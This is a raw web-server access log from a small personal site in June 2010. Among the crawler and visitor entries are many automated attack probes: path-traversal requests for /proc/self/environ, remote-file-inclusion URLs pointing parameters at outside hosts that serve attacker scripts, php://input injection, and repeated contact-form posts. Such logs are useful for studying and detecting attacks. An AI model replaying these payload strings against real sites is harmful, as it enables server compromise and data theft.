85.236.50.166 - - [28/Jun/2010:19:34:22 -0500] "POST /logs/access_log.1276819200/index.php?theme_path=php://input HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:34:22 -0500] "POST /index.php?theme_path=php://input HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:34:22 -0500] "POST /logs/index.php?theme_path=php://input HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:34:23 -0500] "POST /logs/access_log.1276819200/index.php?theme_path=php://input HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:34:24 -0500] "POST /index.php?theme_path=php://input HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:34:24 -0500] "POST /logs/index.php?theme_path=php://input HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.15.152.183 - - [28/Jun/2010:19:37:33 -0500] "GET /logs/access_log.1276819200//linkadmin.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.195.112.180 - - [28/Jun/2010:19:38:54 -0500] "GET /logs/access_log.1276992000 HTTP/1.0" 200 640295 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.152.183 - - [28/Jun/2010:19:44:51 -0500] "GET /logs/access_log.1276128000//linkadmin.php?page=http://www.porto.napoli.it/xml/bond1.php HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:19:44:51 -0500] "GET //linkadmin.php?page=http://www.porto.napoli.it/xml/bond1.php HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:19:44:52 -0500] "GET /logs//linkadmin.php?page=http://www.porto.napoli.it/xml/bond1.php HTTP/1.1" 404 303 "-""libwww-perl/5.65"
207.46.13.141 - - [28/Jun/2010:19:44:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.141 - - [28/Jun/2010:19:45:29 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.15.152.183 - - [28/Jun/2010:19:49:26 -0500] "GET /logs/access_log.1276819200//linkadmin.php?page=http://www.porto.napoli.it/xml/bond1.php HTTP/1.1" 404 325 "-""libwww-perl/5.65"
62.149.233.199 - - [28/Jun/2010:19:54:25 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
62.149.233.199 - - [28/Jun/2010:19:54:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
62.149.233.199 - - [28/Jun/2010:19:54:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
62.149.233.199 - - [28/Jun/2010:19:54:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
62.149.233.199 - - [28/Jun/2010:19:54:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
62.149.233.199 - - [28/Jun/2010:19:54:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.195.112.180 - - [28/Jun/2010:19:57:07 -0500] "GET /logs/access_log.1238198400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [28/Jun/2010:19:59:52 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:19:59:54 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:19:59:57 -0500] "GET /logs/access_log.1217462400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:19:59:59 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:01 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:03 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:06 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:08 -0500] "GET /logs/access_log.1217894400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:10 -0500] "GET /logs/access_log.1217980800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:12 -0500] "GET /logs/access_log.1218067200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [28/Jun/2010:20:00:15 -0500] "GET /logs/access_log.1262390400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.178 - - [28/Jun/2010:20:01:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.30.129.57 - - [28/Jun/2010:20:02:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.30.129.57 - - [28/Jun/2010:20:02:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.30.129.57 - - [28/Jun/2010:20:02:53 -0500] "GET /logs/access_log.1277164800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.30.129.57 - - [28/Jun/2010:20:02:53 -0500] "GET /logs/access_log.1274832000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.30.129.57 - - [28/Jun/2010:20:03:26 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.30.129.57 - - [28/Jun/2010:20:03:27 -0500] "GET /logs/access_log.1277164800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.30.129.57 - - [28/Jun/2010:20:03:27 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.250.252.241 - - [28/Jun/2010:20:03:44 -0500] "GET /logs/ HTTP/1.1" 200 11360 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.30.129.57 - - [28/Jun/2010:20:04:09 -0500] "GET /logs/access_log.1274832000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
24.107.237.247 - - [28/Jun/2010:20:06:56 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"
24.107.237.247 - - [28/Jun/2010:20:06:56 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"
24.107.237.247 - - [28/Jun/2010:20:06:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"
201.62.99.157 - - [28/Jun/2010:20:07:42 -0500] "GET /logs/access_log.1276646400/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
201.62.99.157 - - [28/Jun/2010:20:07:42 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.120.234.211 - - [28/Jun/2010:20:07:43 -0500] "GET //web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
201.62.99.157 - - [28/Jun/2010:20:07:43 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.120.234.211 - - [28/Jun/2010:20:07:54 -0500] "GET //web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
201.62.99.157 - - [28/Jun/2010:20:08:25 -0500] "GET /logs/access_log.1276041600/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.120.234.211 - - [28/Jun/2010:20:09:16 -0500] "GET //web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:20:14:05 -0500] "GET /logs/access_log.1274400000//web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:20:14:05 -0500] "GET //web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:20:14:05 -0500] "GET /logs//web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:20:14:12 -0500] "GET /logs/access_log.1275696000//web2/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.831"
207.46.204.184 - - [28/Jun/2010:20:20:27 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.111.176.206 - - [28/Jun/2010:20:24:01 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:20:29:41 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [28/Jun/2010:20:32:49 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.176.206 - - [28/Jun/2010:20:35:37 -0500] "GET /logs/access_log.1275696000/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
89.111.176.206 - - [28/Jun/2010:20:35:37 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
89.111.176.206 - - [28/Jun/2010:20:35:37 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
76.15.225.135 - - [28/Jun/2010:20:38:12 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.15.225.135 - - [28/Jun/2010:20:38:12 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.15.225.135 - - [28/Jun/2010:20:38:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.15.225.135 - - [28/Jun/2010:20:38:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.199.193 - - [28/Jun/2010:20:39:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.234.100.196 - - [28/Jun/2010:20:39:51 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [28/Jun/2010:20:39:52 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
201.62.99.157 - - [28/Jun/2010:20:42:31 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:42:34 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
174.120.234.211 - - [28/Jun/2010:20:42:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
201.62.99.157 - - [28/Jun/2010:20:48:24 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:48:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:48:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
211.234.100.196 - - [28/Jun/2010:20:48:42 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
201.62.99.157 - - [28/Jun/2010:20:51:03 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:51:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:51:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
79.137.233.6 - - [28/Jun/2010:20:51:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:20:51:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:20:51:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
201.62.99.157 - - [28/Jun/2010:20:53:49 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:53:50 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:53:52 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:54:14 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:54:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
201.62.99.157 - - [28/Jun/2010:20:54:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
207.46.13.145 - - [28/Jun/2010:21:00:28 -0500] "GET /logs/access_log.1188864000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.112 - - [28/Jun/2010:21:06:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.137.233.6 - - [28/Jun/2010:21:07:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:08 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:09 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:09 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:10 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:11 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:11 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:07:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.55.51.112 - - [28/Jun/2010:21:07:17 -0500] "GET /artwork/furniture.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.137.233.6 - - [28/Jun/2010:21:11:50 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:50 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:51 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:52 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:52 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:52 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:52 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:52 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:21:11:52 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.250.252.241 - - [28/Jun/2010:21:14:46 -0500] "GET /logs/access_log.1276646400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
211.234.100.196 - - [28/Jun/2010:21:17:53 -0500] "GET /logs/access_log.1276300800//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.805"
211.234.100.196 - - [28/Jun/2010:21:17:54 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
211.234.100.196 - - [28/Jun/2010:21:17:55 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
174.120.181.101 - - [28/Jun/2010:21:21:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
203.147.62.92 - - [28/Jun/2010:21:24:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:24:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:21:26:19 -0500] "GET /logs/access_log.1202342400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.147.62.92 - - [28/Jun/2010:21:26:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:21:26:53 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 1778 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.147.62.92 - - [28/Jun/2010:21:30:16 -0500] "GET /logs/access_log.1277164800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:30:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:30:17 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.228.107.2 - - [28/Jun/2010:21:31:24 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
81.31.149.80 - - [28/Jun/2010:21:31:24 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
203.147.62.92 - - [28/Jun/2010:21:31:51 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:33:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:34:52 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:34:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:34:54 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:35:36 -0500] "GET /logs/access_log.1277164800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
189.108.172.26 - - [28/Jun/2010:21:36:04 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.147.62.92 - - [28/Jun/2010:21:37:05 -0500] "GET /logs/access_log.1275004800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:37:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:37:06 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:21:37:59 -0500] "GET /logs/access_log.1194912000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
